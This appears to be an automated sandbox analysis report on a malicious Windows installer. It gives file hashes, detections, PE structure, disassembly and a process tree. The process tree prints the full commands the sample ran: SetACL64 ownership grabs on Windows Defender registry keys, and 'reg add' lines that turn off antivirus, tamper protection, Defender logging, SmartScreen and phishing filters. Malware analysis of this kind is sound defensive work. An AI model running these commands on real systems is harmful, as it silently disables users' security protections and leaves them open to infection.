                                                MD5:6B1213639BC5FFC4F1AF8C17420D4B1F
                                                SHA1:EE2D622099FB19A8ED7E1C6137F60AC86FA65486
                                                SHA-256:1FA9E2264B4954F01A83F6A4E8BC7982516091E0FB0C6A2F6154FA87164148B7
                                                SHA-512:03A81297F140B0428636452075C1465D895485268BA243B03562495A5FF46CD392EF8D1A13D0C738D2CF3B560D0EF73AFCC63F210B3BDBF4D931E2E204CF4498
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 5%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..e.........."...0..............'... ...@....@.. ....................................@..................................'..O....@.......................`......X&............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H........ ...............................................................0..$.......s............o.......,..o.......&..*.................... ........(....*BSJB............v2.0.50727......l.......#~..P...h...#Strings............#US.........#GUID...........#Blob...........G..........3....................................................................d.....8.......................k.....7.....P...........x.....V...........L.....^.S...5.......................'.=.....P ..........
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):281
                                                Entropy (8bit):5.066733139951878
                                                Encrypted:false
                                                SSDEEP:6:TMVBd1IGMfVymRMT4/0xFCqa7VNQA1Q7VJdfEyFRfyrhAW4QIm:TMHdGGsVymhs8rzcrfyW3xm
                                                MD5:4E15196F1F466FB6200550D7F678BB9D
                                                SHA1:F474593BCC3148464D6DE0E0D3DF58C76A9718AB
                                                SHA-256:5C3A338369C8B23A7021732FB167AB0FCB3C4BE9B6EEC7A726C8D9875890CCC1
                                                SHA-512:6B3E8C65D3ECCC1DBF32C957CDC0AB05E85680603ED43587194E93B4117292290085A14D1711872B1C6277159E50E409EEFDA813A13FC314A63BEC6DE2D95E43
                                                Malicious:true
                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true"> .. .. <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup>..</configuration>..
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):6144
                                                Entropy (8bit):4.655569464152001
                                                Encrypted:false
                                                SSDEEP:96:/uidPNKO2mkcQ7DBOrkB0kPkKXwF4dkd8Nue3qYMns1BjgtRQWWzNt:FIOu7DBOrkB0kPkKXwF4dkd8Nn34nUBR
                                                MD5:7CB364701028767F8942CC3F8439F8F2
                                                SHA1:D6BEDE2206B7042B4CAE32F416E1B43FFAC94238
                                                SHA-256:A2716605F8DD1930808E6918DB670A3FE32287791862883DBABD26849B87B09E
                                                SHA-512:3011B3D64F79280AB05DE9658C4F5A13F637AD2E79D5770CFAEB3AF6CB8C7A56B610DAD69FDF295112BE64CFB80E18F30BB1829EB3C0E549105F63D0E770DC13
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 1%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dK............"...0.............:-... ...@....@.. ....................................`..................................,..O....@.......................`......P,..8............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P!...............................................................0..V.........(....,Lr...p......%..{..........%..{..........%..{..........%. ]X..(..........(....*..(....*...0..Z.........}......}......}.............. ....}......(....-&..{....}......{....}......{....}.....*.*...0............(....,..{..........*.*..(....*BSJB............v4.0.30319......l.......#~..L.......#Strings.... ...$...#US.D.......#GUID...T.......#Blob...........W=.........3................#.......
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.975632365239815
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Ms63nDrOBa.exe
                                                File size:902'871 bytes
                                                MD5:ad3a57927668a9560b5f01d7ff54c881
                                                SHA1:d0c66b9b5e5f58baff91f23f91a67fd3e8359662
                                                SHA256:efc2d3750186e0038a9bfb4e292298f92bce9f80d2af0a992a3e5fe0c9f29ecf
                                                SHA512:5d9f7f4c416a98cc2642e902fdbff240eca85e834021bbe6d29b1a1f892eaebea338254cd7354bce3c89d2ce0c47a8a5c72d94babf5ee34e04960648fcdc5733
                                                SSDEEP:24576:MGxOmgcf/CoFPz8s43+ae4Y9hJ9HFtMr6lLwLkM0VP90esL:Xx/zCoZz943+YaJNFtM+5wL3AP9KL
                                                TLSH:761523BEA3C9D877E1E312700B5905750BD25E166D98893AE7933CC8B737702AB6D306
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L...Y..d.................h....:....
                                                Icon Hash:202c38303420a0cd
                                                Entrypoint:0x40350f
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x64A0DC59 [Sun Jul 2 02:09:29 2023 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                Instruction
                                                sub esp, 000003F8h
                                                push ebp
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebp, ebp
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebp
                                                mov dword ptr [esp+18h], 0040A2D8h
                                                mov dword ptr [esp+14h], ebp
                                                call dword ptr [004080A4h]
                                                mov esi, dword ptr [004080A8h]
                                                lea eax, dword ptr [esp+34h]
                                                push eax
                                                mov dword ptr [esp+4Ch], ebp
                                                mov dword ptr [esp+0000014Ch], ebp
                                                mov dword ptr [esp+00000150h], ebp
                                                mov dword ptr [esp+38h], 0000011Ch
                                                call esi
                                                test eax, eax
                                                jne 00007F60F52306EAh
                                                lea eax, dword ptr [esp+34h]
                                                mov dword ptr [esp+34h], 00000114h
                                                push eax
                                                call esi
                                                mov ax, word ptr [esp+48h]
                                                mov ecx, dword ptr [esp+62h]
                                                sub ax, 00000053h
                                                add ecx, FFFFFFD0h
                                                neg ax
                                                sbb eax, eax
                                                mov byte ptr [esp+0000014Eh], 00000004h
                                                not eax
                                                and eax, ecx
                                                mov word ptr [esp+00000148h], ax
                                                cmp dword ptr [esp+38h], 0Ah
                                                jnc 00007F60F52306B8h
                                                and word ptr [esp+42h], 0000h
                                                mov eax, dword ptr [esp+40h]
                                                movzx ecx, byte ptr [esp+3Ch]
                                                mov dword ptr [007A8318h], eax
                                                xor eax, eax
                                                mov ah, byte ptr [esp+38h]
                                                movzx eax, ax
                                                or eax, ecx
                                                xor ecx, ecx
                                                mov ch, byte ptr [esp+00000148h]
                                                movzx ecx, cx
                                                shl eax, 10h
                                                or eax, ecx
                                                movzx ecx, byte ptr [esp+0000004Eh]
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3e0000 | 0x42a8 | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x1000 | 0x66b1 | 0x6800 | fc80ef3332ba3a0dd802b98a9723e67d | False | 0.6719501201923077 | data | 6.466881320096335 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata | 0x8000 | 0x1358 | 0x1400 | f0b500ff912dda10f31f36da3efc8a1e | False | 0.44296875 | data | 5.102094016108248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data | 0xa000 | 0x39e378 | 0x600 | 89ffa2c22129e298ad6a3abf19eb19b0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata | 0x3a9000 | 0x37000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc | 0x3e0000 | 0x42a8 | 0x4400 | 8fd15985020fbabc749233d6fb67da82 | False | 0.3312844669117647 | data | 5.175218885302942 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                RT_ICON | 0x3e01f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.3017634854771784
                                                RT_ICON | 0x3e2798 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.3651500938086304
                                                RT_ICON | 0x3e3840 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.5336879432624113
                                                RT_DIALOG | 0x3e3ca8 | 0x100 | data | English | United States | 0.5234375
                                                RT_DIALOG | 0x3e3da8 | 0x11c | data | English | United States | 0.6056338028169014
                                                RT_DIALOG | 0x3e3ec8 | 0x60 | data | English | United States | 0.7291666666666666
                                                RT_GROUP_ICON | 0x3e3f28 | 0x30 | data | English | United States | 0.8333333333333334
                                                RT_MANIFEST | 0x3e3f58 | 0x349 | XML 1.0 document, ASCII text, with very long lines (841), with no line terminators | English | United States | 0.5517241379310345
DLL | Import
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 12, 2024 09:53:32.590533972 CEST | 53 | 55636 | 1.1.1.1 | 192.168.2.6

                                                Target ID:0
                                                Start time:03:53:11
                                                Start date:12/07/2024
                                                Path:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Ms63nDrOBa.exe"
                                                Imagebase:0x400000
                                                File size:902'871 bytes
                                                MD5 hash:AD3A57927668A9560B5F01D7FF54C881
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:03:53:12
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat
                                                Imagebase:0x1c0000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:03:53:12
                                                Start date:12/07/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:4
                                                Start time:03:53:12
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 0%, ReversingLabs
• Detection: 0%, Virustotal
                                                Reputation:low
                                                Has exited:true

                                                Target ID:5
                                                Start time:03:53:12
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.bat
                                                Imagebase:0x1c0000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:03:53:12
                                                Start date:12/07/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:03:53:12
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:8
                                                Start time:03:53:13
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:9
                                                Start time:03:53:13
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:10
                                                Start time:03:53:13
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:11
                                                Start time:03:53:13
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:12
                                                Start time:03:53:13
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:13
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:14
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:15
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:16
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:17
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:18
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:19
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:20
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:21
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:22
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:23
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:24
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:25
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:26
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
                                                Imagebase:0x7ff66e660000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:27
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
